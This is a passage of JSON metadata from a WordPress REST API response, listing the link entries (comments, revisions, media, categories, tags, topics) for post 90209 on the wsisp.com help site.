/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/comments?post=90209"}],"version-history":[{"count":0,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/posts\/90209\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media\/90190"}],"wp:attachment":[{"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/media?parent=90209"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/categories?post=90209"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/tags?post=90209"},{"taxonomy":"topic","embeddable":true,"href":"https:\/\/www.wsisp.com\/helps\/wp-json\/wp\/v2\/topic?post=90209"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}